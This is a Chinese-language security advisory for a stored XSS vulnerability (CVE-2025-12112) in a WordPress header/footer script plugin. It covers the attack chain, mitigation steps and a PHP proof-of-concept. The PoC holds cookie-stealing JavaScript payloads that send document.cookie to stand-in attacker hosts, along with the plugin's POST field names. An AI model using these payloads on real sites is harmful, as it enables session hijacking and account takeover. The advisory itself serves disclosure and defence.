CVE-2025-12112 WordPress HT Script插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-12112

漏洞类型

存储型跨站脚本(XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Insert Headers and Footers Code – HT Script (WordPress插件)

漏洞概述

CVE-2025-12112是WordPress插件"Insert Headers and Footers Code – HT Script"中的一个存储型跨站脚本(XSS)漏洞。该插件用于在WordPress网站的头部和页脚位置插入自定义代码（如JavaScript、HTML等）。漏洞存在于1.1.6及以下所有版本，由于插件对用户权限检查不足，认证攻击者只要拥有Author（作者）级别或更高的账户权限，即可在网页中注入任意恶意脚本代码。被注入的恶意脚本会永久存储在数据库中，当其他用户访问包含恶意代码的页面时，脚本会自动执行，可能导致会话劫持、敏感信息窃取、网页篡改等安全危害。由于该漏洞属于存储型XSS，攻击者只需一次注入，受害者每次访问相关页面都会触发恶意代码，危害具有持续性。

技术细节

该漏洞的根本原因在于插件缺乏充分的权限验证机制。Insert Headers and Footers Code插件允许用户通过管理界面在网站头部或页脚插入自定义脚本代码。正常情况下，插入脚本的功能应该仅限管理员（Administrator）使用，但实际上该插件没有正确验证用户角色，将脚本插入功能暴露给了Author级别的用户。攻击者利用此漏洞可以：1）通过Author账户登录WordPress后台；2）导航到插件设置页面；3）在头部或页脚注入恶意JavaScript代码（如窃取Cookie的脚本）；4）保存设置后，恶意代码被永久存储在WordPress数据库的wp_options表中；5）当任何用户访问网站任意页面时，恶意脚本会自动执行。攻击者可利用此漏洞窃取管理员会话令牌、劫持用户账户、进行钓鱼攻击或植入更多恶意内容。由于脚本会被加载到所有页面，攻击面覆盖整个站点。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress站点的Author级别或更高权限的用户账户

STEP 2

步骤2

攻击者登录WordPress后台，导航至"设置" > "Insert Headers and Footers"插件配置页面

STEP 3

步骤3

在插件的头部脚本输入框中注入恶意JavaScript代码，如窃取Cookie的脚本

STEP 4

步骤4

点击保存后，恶意脚本被永久存储在数据库的wp_options表中

STEP 5

步骤5

当管理员或其他用户访问网站任意页面时，恶意脚本自动执行

STEP 6

步骤6

攻击者获取受害者Cookie或会话信息，进而劫持账户或窃取敏感数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
/**
 * CVE-2025-12112 PoC - HT Script Plugin Stored XSS
 * Requirements: WordPress account with Author role or higher
 * Target: Insert Headers and Footers Code plugin <= 1.1.6
 */

// Step 1: Authenticate with WordPress using Author credentials
$target_url = "http://target-wordpress-site.com";
$username = "attacker_author";
$password = "author_password";

// Step 2: Access plugin settings page and inject malicious script
$exploit_payload = '<script>fetch("https://attacker-server.com/steal?cookie="+document.cookie)</script>';

// The payload can be injected via:
// - WordPress Admin > Settings > Insert Headers and Footers
// - Direct POST request to wp-admin/options-general.php?page=ht-script

// Example POST data structure:
$post_data = array(
    'ht_script_header' => $exploit_payload,
    'ht_script_footer' => '',
    'ht_script_submit' => 'Save Changes'
);

// Step 3: When any user visits the site, the XSS payload executes automatically
// The injected script runs in the context of the victim's browser session

/**
 * Example JavaScript payload for credential theft:
 * <script>
 *   var cookies = document.cookie;
 *   var data = {cookies: cookies, url: window.location.href};
 *   fetch('https://attacker.com/log?data=' + btoa(JSON.stringify(data)));
 * </script>
 */

影响范围

Insert Headers and Footers Code – HT Script <= 1.1.6

防御指南

临时缓解措施

临时缓解措施：1）立即禁用受影响的Insert Headers and Footers Code插件；2）检查wp_options表中ht_script相关的选项值，清理所有恶意代码；3）审查所有Author及以上级别用户的活动日志；4）强制重置所有可能受影响的用户会话；5）启用Web应用防火墙规则防护XSS攻击；6）通知可能受影响的网站管理员和用户。由于该漏洞利用门槛较低（仅需Author权限），建议尽快升级到插件最新版本以彻底修复。